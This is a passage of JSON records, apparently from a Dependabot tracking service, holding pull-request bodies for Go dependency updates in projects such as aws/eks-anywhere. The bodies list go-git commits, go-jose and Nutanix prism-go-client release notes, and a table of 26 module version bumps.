href=\"https://redirect.github.com/go-git/go-git/issues/2065\"\u003e#2065\u003c/a\u003e from go-git/commit-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/d315264343cead712aa9eb56475c2ec96f5ecef1\"\u003e\u003ccode\u003ed315264\u003c/code\u003e\u003c/a\u003e plumbing: object, Reset object before decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/6e1d34890a4dae8a0df738e531234bd60b7e9b66\"\u003e\u003ccode\u003e6e1d348\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tree handling with upstream\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/e134ba34cf95ed0167e5b1df36a933d7bde9d02d\"\u003e\u003ccode\u003ee134ba3\u003c/code\u003e\u003c/a\u003e tests: Skip double checks in Git v2.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/1971422f6b1bec9176061b3293306981cfff981e\"\u003e\u003ccode\u003e1971422\u003c/code\u003e\u003c/a\u003e tests: Add git conformance tests for signing verification\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/a387aa8857a8fbba8e74b7f5485e9e030669ab5d\"\u003e\u003ccode\u003ea387aa8\u003c/code\u003e\u003c/a\u003e plumbing: object, Add ErrMalformedTag\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/f415670d906b5c6169d1fdc64f3f9f1d33eb6f9c\"\u003e\u003ccode\u003ef415670\u003c/code\u003e\u003c/a\u003e plumbing: object, Decode Tag headers via a state machine\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/5b0cd38a62e2336bb5f1a2ad0eb8ac8f9e7b740e\"\u003e\u003ccode\u003e5b0cd38\u003c/code\u003e\u003c/a\u003e plumbing: object, Reject multi-signature commits at Verify\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fe8ed6223a6079d9fd84d853362a996e7df175fb\"\u003e\u003ccode\u003efe8ed62\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tag.EncodeWithoutSignature with Commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/98e337d5bdc4c0536a40ab7381b2231f7e0b15cd\"\u003e\u003ccode\u003e98e337d\u003c/code\u003e\u003c/a\u003e plumbing: object, Add support for Tag.SignatureSHA256\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: adding API calls for dataPolicy by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/340\"\u003enutanix-cloud-native/prism-go-client#340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/341\"\u003enutanix-cloud-native/prism-go-client#341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adds the Nutanix Insights REST client by \u003ca href=\"https://github.com/sauravknx\"\u003e\u003ccode\u003e@​sauravknx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/339\"\u003enutanix-cloud-native/prism-go-client#339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: split error handling into contract and v4 implementation by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/342\"\u003enutanix-cloud-native/prism-go-client#342\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add ListNicsByVmId to VMs service by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/352\"\u003enutanix-cloud-native/prism-go-client#352\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: Add UUID in the URL path for UpdateK8sRegistration by \u003ca href=\"https://github.com/priyadarshini7q\"\u003e\u003ccode\u003e@​priyadarshini7q\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/335\"\u003enutanix-cloud-native/prism-go-client#335\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.1...v0.7.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs t...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10766","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10766","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10766/packages"}},{"old_version":"1.50.36","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-05-11T09:22:08.000Z","version_change":"1.50.36 → 1.55.8","issue":{"uuid":"4419601275","node_id":"PR_kwDOKp_HZs7aLzcB","number":252,"state":"open","title":"deps(deps): bump the gomod-minor-and-patch group across 1 directory with 32 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-11T09:22:08.000Z","updated_at":"2026-05-11T09:23:30.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(deps): bump","group_name":"gomod-minor-and-patch","update_count":32,"packages":[{"name":"cloud.google.com/go/storage","old_version":"1.49.0","new_version":"1.62.1","repository_url":"https://github.com/googleapis/google-cloud-go"},{"name":"github.com/MShekow/directory-checksum","old_version":"1.4.9","new_version":"1.4.18","repository_url":"https://github.com/MShekow/directory-checksum"},{"name":"github.com/atombender/go-jsonschema","old_version":"0.23.0","new_version":"0.23.1","repository_url":"https://github.com/atombender/go-jsonschema"},{"name":"github.com/aws/aws-lambda-go","old_version":"1.47.0","new_version":"1.54.0","repository_url":"https://github.com/aws/aws-lambda-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-secretsmanager-caching-go","old_version":"1.1.3","new_version":"1.2.0","repository_url":"https://github.com/aws/aws-secretsmanager-caching-go"},{"name":"github.com/cloudflare/cloudflare-go","old_version":"0.104.0","new_version":"0.116.0","repository_url":"https://github.com/cloudflare/cloudflare-go"},{"name":"github.com/disgoorg/disgo","old_version":"0.18.5","new_version":"0.19.3","repository_url":"https://github.com/disgoorg/disgo"},{"name":"github.com/fatih/color","old_version":"1.18.0","new_version":"1.19.0","repository_url":"https://github.com/fatih/color"},{"name":"github.com/go-git/go-billy/v5","old_version":"5.8.0","new_version":"5.9.0","repository_url":"https://github.com/go-git/go-billy"},{"name":"github.com/go-git/go-git/v5","old_version":"5.18.0","new_version":"5.19.0","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.40.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/otiai10/copy","old_version":"1.14.0","new_version":"1.14.1","repository_url":"https://github.com/otiai10/copy"},{"name":"github.com/pulumi/pulumi-aws/sdk/v6","old_version":"6.83.0","new_version":"6.83.3","repository_url":"https://github.com/pulumi/pulumi-aws"},{"name":"github.com/pulumi/pulumi-cloudflare/sdk/v6","old_version":"6.2.0","new_version":"6.15.0","repository_url":"https://github.com/pulumi/pulumi-cloudflare"},{"name":"github.com/pulumi/pulumi-docker/sdk/v4","old_version":"4.5.8","new_version":"4.11.2","repository_url":"https://github.com/pulumi/pulumi-docker"},{"name":"github.com/pulumi/pulumi-gcp/sdk/v8","old_version":"8.0.0","new_version":"8.41.1","repository_url":"https://github.com/pulumi/pulumi-gcp"},{"name":"github.com/pulumi/pulumi-kubernetes/sdk/v4","old_version":"4.18.1","new_version":"4.30.0","repository_url":"https://github.com/pulumi/pulumi-kubernetes"},{"name":"github.com/pulumi/pulumi-mongodbatlas/sdk/v3","old_version":"3.30.0","new_version":"3.38.0","repository_url":"https://github.com/pulumi/pulumi-mongodbatlas"},{"name":"github.com/pulumi/pulumi-random/sdk/v4","old_version":"4.17.0","new_version":"4.19.2","repository_url":"https://github.com/pulumi/pulumi-random"},{"name":"github.com/pulumi/pulumi/pkg/v3","old_version":"3.184.0","new_version":"3.237.0","repository_url":"https://github.com/pulumi/pulumi"},{"name":"github.com/samber/lo","old_version":"1.38.1","new_version":"1.53.0","repository_url":"https://github.com/samber/lo"},{"name":"github.com/tmc/langchaingo","old_version":"0.1.13","new_version":"0.1.14","repository_url":"https://github.com/tmc/langchaingo"},{"name":"go.mongodb.org/mongo-driver","old_version":"1.16.1","new_version":"1.17.9","repository_url":"https://github.com/mongodb/mongo-go-driver"},{"name":"k8s.io/apimachinery","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/kubernetes/apimachinery"},{"name":"k8s.io/client-go","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/kubernetes/client-go"}],"path":null,"ecosystem":"go"},"body":"Bumps the gomod-minor-and-patch group with 26 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [cloud.google.com/go/storage](https://github.com/googleapis/google-cloud-go) | `1.49.0` | `1.62.1` |\n| [github.com/MShekow/directory-checksum](https://github.com/MShekow/directory-checksum) | `1.4.9` | `1.4.18` |\n| [github.com/atombender/go-jsonschema](https://github.com/atombender/go-jsonschema) | `0.23.0` | `0.23.1` |\n| [github.com/aws/aws-lambda-go](https://github.com/aws/aws-lambda-go) | `1.47.0` | `1.54.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-secretsmanager-caching-go](https://github.com/aws/aws-secretsmanager-caching-go) | `1.1.3` | `1.2.0` |\n| [github.com/cloudflare/cloudflare-go](https://github.com/cloudflare/cloudflare-go) | `0.104.0` | `0.116.0` |\n| [github.com/disgoorg/disgo](https://github.com/disgoorg/disgo) | `0.18.5` | `0.19.3` |\n| [github.com/fatih/color](https://github.com/fatih/color) | `1.18.0` | `1.19.0` |\n| [github.com/go-git/go-billy/v5](https://github.com/go-git/go-billy) | `5.8.0` | `5.9.0` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.18.0` | `5.19.0` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/otiai10/copy](https://github.com/otiai10/copy) | `1.14.0` | `1.14.1` |\n| [github.com/pulumi/pulumi-aws/sdk/v6](https://github.com/pulumi/pulumi-aws) | `6.83.0` | `6.83.3` |\n| [github.com/pulumi/pulumi-cloudflare/sdk/v6](https://github.com/pulumi/pulumi-cloudflare) | `6.2.0` | `6.15.0` |\n| [github.com/pulumi/pulumi-docker/sdk/v4](https://github.com/pulumi/pulumi-docker) | `4.5.8` | `4.11.2` |\n| [github.com/pulumi/pulumi-gcp/sdk/v8](https://github.com/pulumi/pulumi-gcp) | `8.0.0` | `8.41.1` |\n| [github.com/pulumi/pulumi-kubernetes/sdk/v4](https://github.com/pulumi/pulumi-kubernetes) | `4.18.1` | `4.30.0` |\n| [github.com/pulumi/pulumi-mongodbatlas/sdk/v3](https://github.com/pulumi/pulumi-mongodbatlas) | `3.30.0` | `3.38.0` |\n| [github.com/pulumi/pulumi-random/sdk/v4](https://github.com/pulumi/pulumi-random) | `4.17.0` | `4.19.2` |\n| [github.com/pulumi/pulumi/pkg/v3](https://github.com/pulumi/pulumi) | `3.184.0` | `3.237.0` |\n| [github.com/samber/lo](https://github.com/samber/lo) | `1.38.1` | `1.53.0` |\n| [github.com/tmc/langchaingo](https://github.com/tmc/langchaingo) | `0.1.13` | `0.1.14` |\n| [go.mongodb.org/mongo-driver](https://github.com/mongodb/mongo-go-driver) | `1.16.1` | `1.17.9` |\n| [k8s.io/apimachinery](https://github.com/kubernetes/apimachinery) | `0.35.0` | `0.36.0` |\n| [k8s.io/client-go](https://github.com/kubernetes/client-go) | `0.35.0` | `0.36.0` |\n\n\nUpdates `cloud.google.com/go/storage` from 1.49.0 to 1.62.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/f4b10eef3a7b114033d52c8d83ad43b105a150b3\"\u003e\u003ccode\u003ef4b10ee\u003c/code\u003e\u003c/a\u003e chore: librarian release pull request: 20260413T041034Z (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14421\"\u003e#14421\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/dc245af5198456acf9bdfae73d4158ad5c9f183c\"\u003e\u003ccode\u003edc245af\u003c/code\u003e\u003c/a\u003e feat(storage): add client feature tracking support (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14320\"\u003e#14320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/cfdd7bad68d2e8e5aecbb7dc3a83ac73bedb57d0\"\u003e\u003ccode\u003ecfdd7ba\u003c/code\u003e\u003c/a\u003e chore(.github/CODEOWNERS): Add AION SDK as code owners for the auth library (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/e2d578ca0c118a7d1d8d5e7b44507b6ae3fdb6fe\"\u003e\u003ccode\u003ee2d578c\u003c/code\u003e\u003c/a\u003e test(datastore): skip flaky tests due to datastore contention (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14416\"\u003e#14416\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/56e1a627d59944afed2ec634cdd9a0f90a4902fc\"\u003e\u003ccode\u003e56e1a62\u003c/code\u003e\u003c/a\u003e chore: librarian release pull request: 20260409T222456Z (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14413\"\u003e#14413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/5ca653ac3e0880547cd674747315007bbd253910\"\u003e\u003ccode\u003e5ca653a\u003c/code\u003e\u003c/a\u003e chore: regenerate libraries using protobuf 31, and update generation check wo...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/b4c40aab7f8a73c74b0f443149c33240aa3de7b6\"\u003e\u003ccode\u003eb4c40aa\u003c/code\u003e\u003c/a\u003e chore(all): update module go.opentelemetry.io/otel/sdk to v1.43.0 [SECURITY] ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/eb896d05d9f437e8f9550c4121f9dfc2337500d7\"\u003e\u003ccode\u003eeb896d0\u003c/code\u003e\u003c/a\u003e chore(deps): bump go.opentelemetry.io/otel/sdk from 1.42.0 to 1.43.0 in /comp...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/26c0341bb0ad65176f4de1e55a9c0d0297f49df4\"\u003e\u003ccode\u003e26c0341\u003c/code\u003e\u003c/a\u003e chore(deps): bump go.opentelemetry.io/otel/sdk from 1.42.0 to 1.43.0 in /cont...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/8a7febced0fc60e204c035798928e82ce53cf428\"\u003e\u003ccode\u003e8a7febc\u003c/code\u003e\u003c/a\u003e feat(firestore): Implement Search pipeline stage and related expressions (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14\"\u003e#14\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/pubsub/v1.49.0...storage/v1.62.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/MShekow/directory-checksum` from 1.4.9 to 1.4.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MShekow/directory-checksum/releases\"\u003egithub.com/MShekow/directory-checksum's 